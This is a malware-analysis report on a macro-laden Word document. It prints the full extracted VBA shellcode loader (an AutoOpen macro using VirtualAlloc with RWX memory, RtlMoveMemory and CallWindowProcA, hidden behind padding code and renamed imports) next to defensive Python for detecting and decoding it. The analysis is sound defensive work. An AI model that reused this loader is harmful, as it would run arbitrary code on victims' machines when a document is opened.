Verdict: MALICIOUS
Risk score: 210
Heuristics: 8
- Raw OLE macro native-memory callback shellcode loader (critical, OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER): the raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry but the compiled/source project bytes still expose the in-memory shellcode loader triad.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): the document contains VBA macro code.
- VBA native-memory callback shellcode loader (critical, OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADER): a VBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.
  Matched line in script: `Private Declare PtrSafe Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr`
  In this sample the triad is VirtualAlloc (aliased `churchgoing`, called for 4672 bytes with flAllocationType &H1000 = MEM_COMMIT and flProtect &H40 = PAGE_EXECUTE_READWRITE), RtlMoveMemory (`cully`) copying the decoded buffer into it, and CallWindowProcA (`nutbrown`) with lpPrevWndFunc pointing 576 bytes (x64) or 2214 bytes (x86) into that buffer. The hWnd slot of that call carries `ActiveDocument.FullName`, so the shellcode receives the host document's path as its first argument, which is consistent with a stager that re-reads its own document. The other declared imports (GetPriorityClass, CreateEventA, GetDlgItem, EndDialog) are never called in the recovered source and serve only to pad the import list.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro.
  Matched line in script: `Sub AutoOpen()`
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): reference to the VirtualAlloc API.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this report: a VBA project was in fact recovered (macros.bas, below) and its AutoOpen is already flagged by OLE_VBA_AUTOOPEN, so here this marker restates that entry point rather than indicating a WordBasic-only document.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI, present in any document that carries DrawingML shapes or pictures; it is not a network indicator.
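The OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADER heuristic only works if the detector looks past the renamed VBA identifiers to the real exports bound through `Alias`. The script below is an added example (not the analyzer's own code) of that check: it resolves every `Declare ... Alias` to its export, keeps only the names actually invoked in the macro body, and requires allocation, copy, callback and an auto-exec entry together before returning a verdict. Its input is a constructed excerpt of the declare lines and calls from the extracted macros.bas shown further down; the per-family API sets are this example's assumption, not the analyzer's lists.

```python
import re

# Constructed excerpt of the sample's VBA, copied from the macros.bas preview
# in this report; this is the input the detector is exercised on.
SAMPLE_VBA = r'''
#If Win64 Then
Private Declare PtrSafe Sub cully Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Function nutbrown Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
#Else
Private Declare Sub cully Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function nutbrown Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
#End If
Sub endodontic()
breakfast = churchgoing(engrossed, 4672, &H1000, &H40)
cully ByVal breakfast, licitness(0), UBound(licitness) + 1
ancohuma = nutbrown(ByVal breakfast + canthus, unblanched, 0, 0, 0)
End Sub
Sub AutoOpen()
endodontic
End Sub
'''

# API families making up the loader triad. The export names are real Win32/NT
# exports; grouping them into these sets is an assumption of this example.
ALLOC = {"VirtualAlloc", "VirtualAllocEx", "HeapAlloc", "NtAllocateVirtualMemory"}
COPY = {"RtlMoveMemory", "RtlCopyMemory", "WriteProcessMemory", "memcpy"}
CALLBACK = {"CallWindowProcA", "CallWindowProcW", "EnumChildWindows",
            "CreateTimerQueueTimer", "CreateThread", "QueueUserAPC",
            "EnumSystemLocalesA", "SetTimer"}
AUTOEXEC = {"autoopen", "document_open", "autoexec", "auto_open",
            "workbook_open", "autoclose", "document_close"}

DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.IGNORECASE)
SUB_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)',
                    re.IGNORECASE | re.MULTILINE)


def resolve_declares(src):
    """Map each local VBA name to the export it really binds (Alias wins)."""
    return {m.group(1): (m.group(3) or m.group(1)) for m in DECLARE_RE.finditer(src)}


def triage_loader(src):
    """Return which triad members are declared AND called, plus a verdict."""
    aliases = resolve_declares(src)
    body = DECLARE_RE.sub("", src)          # strip the Declare heads themselves
    used = {local: export for local, export in aliases.items()
            if re.search(r"\b%s\b" % re.escape(local), body, re.IGNORECASE)}
    exports = set(used.values())
    hits = {
        "alloc": sorted(exports & ALLOC),
        "copy": sorted(exports & COPY),
        "callback": sorted(exports & CALLBACK),
        "autoexec": sorted(n for n in SUB_RE.findall(src) if n.lower() in AUTOEXEC),
        "aliases": used,
    }
    hits["verdict"] = all(hits[k] for k in ("alloc", "copy", "callback", "autoexec"))
    return hits


if __name__ == "__main__":
    for key, value in triage_loader(SAMPLE_VBA).items():
        print(f"{key:9}: {value}")
```

Matching on resolved exports is what defeats the random-word renaming (`churchgoing`, `cully`, `nutbrown`); a string match on `VirtualAlloc` alone would also fire on the decoy declares that are never called. The same function run over the raw project stream decoded as latin-1 gives the source-stomped variant that OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER describes, since the `Declare` text survives in the module stream even when the extracted source is incomplete.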
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| ole_raw_native_loader_00_plain-b64.bin | ole-raw-native-loader-blob | raw OLE/VBA native-memory callback loader decoded from printable run at offset 0x4C824 using plain-b64 | 3220 bytes | 9dc229b494a1009122822f3cd340cefa5269800942410cca38156271c25dab5e |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7172 bytes | 85a89eeaa55fba6fc0c121551ac4291811090f38d2d9db944221d82f4d7a2b0a |

Detection for ole_raw_native_loader_00_plain-b64.bin: ClamAV found no threats. Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s); indicators: SC_PEB_ACCESS. Both entry offsets used by the macro's CallWindowProcA call (576 for x64, 2214 for x86) fall inside this 3220-byte blob, which is consistent with it being the buffer the macro decodes and executes; the allocation size (4672) is simply larger than the payload.
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function outlier Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Private Declare PtrSafe Sub cully Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function impedition Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Private Declare PtrSafe Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Function vespucci Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr
Private Declare PtrSafe Function nutbrown Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
Private Declare PtrSafe Function foi Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
#Else
Private Declare Function careerist Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long
Private Declare Function compositor Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Private Declare Sub cully Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function nutbrown Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Function overconfident Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
Private Declare Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function dracaena Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long
#End If
Sub PasteMethod()
Dim MyRange As Object
Set MyRange = Selection.Range
' Selection Example:
Selection.Paste
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.Paste
End Sub
Sub endodontic()
Dim oncologist As Byte
Dim buttery As String
cymatiidae = ditto.resent
boredom = balsaminaceae(cymatiidae)
schomburgkia = 42 + 119 - 158
Select Case schomburgkia
Case 1 To 12
amicability = "limonite"
Case 13
asexual = unforethoughtful
Case 16
disincline = UCase("am") + Left("phipbinaurally", 4) + Right("cowherbrion", 4)
penury = "epanchement"
End Select
maple = Mid("okaprearteriectasis", 4, 3) + "visio" + Left("ncarousel", 1)
#If Win64 Then
Dim breakfast As LongPtr
#Else
Dim breakfast As Long
#End If
engrossed = 0
breakfast = churchgoing(engrossed, 4672, &H1000, &H40)
bolometer = "disoblige"
cosmetician = "impassive"
Dim unblanched As String
imbroglio = LCase("GA") + Mid("airstreamthergoldenrod", 10, 4) + Left("umteat", 2)
parting = "hreath"
unblanched = ActiveDocument.FullName
topspin = 26 - 23
Select Case topspin
Case 1 To 10
acromegalic = "brae"
orangeman = "kindling"
Case 11
unforethoughtful = "captivation"
Case 15
rigveda = "alectoria"
elecampane = "mildly"
End Select
Dim licitness() As Byte
licitness = boredom
armenian = "modernism"
cully ByVal breakfast, licitness(0), UBound(licitness) + 1
millenarianism = "shank"
#If Win64 Then
Dim machmeter As Byte
foliaceous = "granular"
preparing = Left("schofriends", 4) & "mburgk" & Right("greenhouseia", 2)
canthus = 576
#ElseIf Win32 Then
canthus = 2214
#End If
Dim aboveboard As Integer
Dim libertas As Variant
ancohuma = nutbrown(ByVal breakfast + canthus, unblanched, 0, 0, 0)
For authoritative = 0 To 58
nitromuriatic = 58
unforethoughtful = asexual
muros = Mid("contrarietypliargentine", 12, 3) + UCase("AbLeN") + "ess"
muros = "na" + Left("mekomaple", 4)
Next authoritative
End Sub
Function balsaminaceae(improvisatore) As String
unforethoughtful = "rotatable"
Dim opinionativeness As Long
Dim lexis(63) As Long
Dim formerly As Long
Dim dispensary(255) As Byte
Dim physic(63) As Long
Dim ireful As String
belie = orchid * 3
Dim abnaki(63) As Long
Dim absorbent() As Byte
Dim medeival As Long
Dim apophysis() As Byte
Dim methodize As Long
Dim imbibition As Integer
jokingly = 255
transmutation = 256
pelargonium = 6 + 7 + 65267
villanous = 63
modifier = 99 - 34 + 262079
aggressive = 15 + 16711665
ecumenic = 56 - 30 + 65510
sarawakian = 121 + 3911
brushy = 258048
burrawong = 4096
ingenuity = 64
pestilent = 111 - 54 + 127 + 16514888
Dim boone As Variant
Dim breachloader() As Byte
ReDim breachloader(Len(improvisatore) - 1)
For i = 1 To Len(improvisatore)
breachloader(i - 1) = CByte(Asc(Mid(improvisatore, i, 1)))
Next
Dim iguanidae As Variant
For canvass = 5 To 76
aureole = 76
asexual = "scurry"
incredulity = StrReverse("ednu") + "rstandi" + Mid("autocraticalngimitation", 13, 2)
incredulity = Left("penconjunction", 3) + "uriously"
Next canvass
imbibition = 0
encyclic = 6 - 110 - 61 + 287
deuteromycetes = 51 - 17 + 221
For formerly = 0 To deuteromycetes
Select Case formerly
Case 65 To 90
dispensary(formerly) = formerly - 65
Case 97 To encyclic
dispensary(formerly) = formerly - 71
Case 48 To 57
dispensary(formerly) = formerly + 4
Case 43
dispensary(formerly) = 62
Case 47
dispensary(formerly) = 63
End Select
Next formerly
For formerly = 0 To 63
lexis(formerly) = formerly * ingenuity
abnaki(formerly) = formerly * burrawong
physic(formerly) = formerly * modifier
Next formerly
apophysis = breachloader
fleissig = 4
ReDim absorbent((((UBound(apophysis) + 1) \ fleissig) * 3) - 1)
For medeival = 0 To UBound(apophysis) Step 4
uncompact = apophysis(medeival)
axle = 42 - 118 + 79
methodize = physic(dispensary(uncompact)) + abnaki(dispensary(apophysis(medeival + 1))) + _
lexis(dispensary(apophysis(medeival + 2))) + dispensary(apophysis(medeival + axle))
formerly = methodize And aggressive
absorbent(opinionativeness) = formerly \ ecumenic
formerly = methodize And pelargonium
absorbent(opinionativeness + 1) = formerly \ transmutation
absorbent(opinionativeness + 2) = methodize And jokingly
opinionativeness = opinionativeness + 3
Next medeival
balsaminaceae = absorbent
End Function
Sub AutoOpen()
#If Win64 Then
endodontic
#ElseIf Win32 Then
arsenal = "para"
santolina = "signora"
endodontic
#Else
#End If
End Sub
Attribute VB_Name = "ditto"
Attribute VB_Base = "0{0E8A8499-08FE-4B0A-8349-0F61D60FAD42}{EAB8A922-E161-421C-B743-D76AA9F451C4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
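Most of `balsaminaceae()` is padding: once the split-up constants are folded (`modifier` = 262144 = 2^18, `burrawong` = 4096 = 2^12, `ingenuity` = 64 = 2^6, `aggressive` = 0xFF0000, `ecumenic` = 0x10000, `pelargonium` = 0xFF00) and the `Select Case` over 0..255 is read as an alphabet table, it is a plain base64 decoder with no padding handling, which is why the analyzer could carve the payload with "plain-b64" straight from the OLE bytes. The `ditto` module, whose `VB_Base` is a pair of GUIDs, has the shape of a UserForm designer module, so `ditto.resent` is most plausibly a form control whose text holds the encoded buffer (an inference from the preview, not something the report states). The script below is an added example (not the analyzer's code): it ports the decoder with the constants folded, checks it against the standard library, reproduces the printable-run carve, and shows what the SC_PEB_ACCESS indicator keys on. The blob it scans is constructed for the example; the PEB-read byte patterns are real x86/x64 encodings, the rest of the values are assumptions of the example.

```python
import base64
import re

# 1. balsaminaceae() with its arithmetic folded. The Select Case builds the
#    standard base64 alphabet: 'A'..'Z' -> 0..25, 'a'..'z' -> 26..51 (97..122
#    minus 71; encyclic = 6 - 110 - 61 + 287 = 122), '0'..'9' -> 52..61, '+', '/'.
_DEC = [0] * 256
for c in range(ord("A"), ord("Z") + 1):
    _DEC[c] = c - 65
for c in range(ord("a"), ord("z") + 1):
    _DEC[c] = c - 71
for c in range(ord("0"), ord("9") + 1):
    _DEC[c] = c + 4
_DEC[ord("+")] = 62
_DEC[ord("/")] = 63


def vba_decode(text):
    """Port of the sample's decoder: 4 chars -> 3 bytes, no padding handling.
    '=' (or any non-alphabet byte) maps to sextet 0, so a padded input yields
    one or two trailing NUL bytes that base64.b64decode would drop."""
    data = text.encode("latin-1")
    if not data or len(data) % 4:
        # The VBA indexes apophysis(medeival + 3) unguarded and would raise
        # "Subscript out of range" here; mirror that with an exception.
        raise ValueError("input length must be a non-zero multiple of 4")
    out = bytearray()
    for i in range(0, len(data), 4):
        q = ((_DEC[data[i]] << 18) | (_DEC[data[i + 1]] << 12)       # physic, abnaki
             | (_DEC[data[i + 2]] << 6) | _DEC[data[i + 3]])         # lexis, raw
        out += bytes(((q & 0xFF0000) >> 16, (q & 0xFF00) >> 8, q & 0xFF))
    return bytes(out)


# 2. The carve behind "decoded from printable run ... using plain-b64": long runs
#    of base64-alphabet bytes anywhere in the file, decoded with a standard decoder.
def carve_b64_runs(blob, min_len=64):
    """Return (offset, decoded_bytes) for each base64-looking run in blob."""
    found = []
    for m in re.finditer(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, blob):
        run = m.group(0)
        run = run[: len(run) - len(run) % 4]      # plain decoders need 4-char groups
        try:
            found.append((m.start(), base64.b64decode(run, validate=True)))
        except ValueError:                         # binascii.Error is a ValueError
            continue
    return found


# 3. What SC_PEB_ACCESS keys on: reads of the PEB pointer through the TEB segment
#    register, the opening move of position-independent Windows shellcode that
#    walks PEB -> Ldr to find kernel32 without an import table.
PEB_ACCESS = {
    "x64 mov rax, gs:[0x60]": bytes.fromhex("65488B042560000000"),
    "x64 mov rcx, gs:[0x60]": bytes.fromhex("65488B0C2560000000"),
    "x86 mov eax, fs:[0x30]": bytes.fromhex("64A130000000"),
    "x86 mov ecx, fs:[0x30]": bytes.fromhex("648B0D30000000"),
    "x86 mov edx, fs:[0x30]": bytes.fromhex("648B1530000000"),
    "x86 mov ebx, fs:[0x30]": bytes.fromhex("648B1D30000000"),
}


def peb_access_hits(code):
    """(offset, mnemonic) for every PEB-access encoding present in code."""
    return sorted((code.find(sig), name) for name, sig in PEB_ACCESS.items() if sig in code)


def triage_blob(blob):
    """Carve every base64 run and report its size plus PEB-access indicators."""
    return [{"offset": hex(off), "size": len(dec), "peb_access": peb_access_hits(dec)}
            for off, dec in carve_b64_runs(blob)]


# Constructed stand-in for the document: OLE magic, filler, then a base64 run whose
# plaintext contains an x64 PEB read. Example data, not the report's 3220-byte blob.
FAKE_CODE = b"\x90" * 40 + PEB_ACCESS["x64 mov rax, gs:[0x60]"] + b"\xC3" + b"\x00" * 25
PAYLOAD_B64 = base64.b64encode(FAKE_CODE)          # 75 bytes -> 100 chars, no padding
SAMPLE_BLOB = b"\xD0\xCF\x11\xE0" + b"\x00" * 500 + PAYLOAD_B64 + b"\x00" * 64

if __name__ == "__main__":
    assert vba_decode(PAYLOAD_B64.decode()) == FAKE_CODE   # the macro's decoder is plain base64
    print(vba_decode("aGVsbG8="))                           # padding quirk: trailing NUL
    print(triage_blob(SAMPLE_BLOB))
```

Two things carry over to the real artifact. First, because the VBA decoder emits NUL bytes for `=`, a payload decoded by the macro can be one or two bytes longer than the analyzer's plain-b64 output; the x64 and x86 entry offsets (576 and 2214) are unaffected since they are measured from the start of the buffer. Second, the PEB-read patterns are a cheap pre-filter, not a classifier: a blob with a hit deserves disassembly from the entry offset the macro actually uses, while a blob without one may still be code that resolves imports another way.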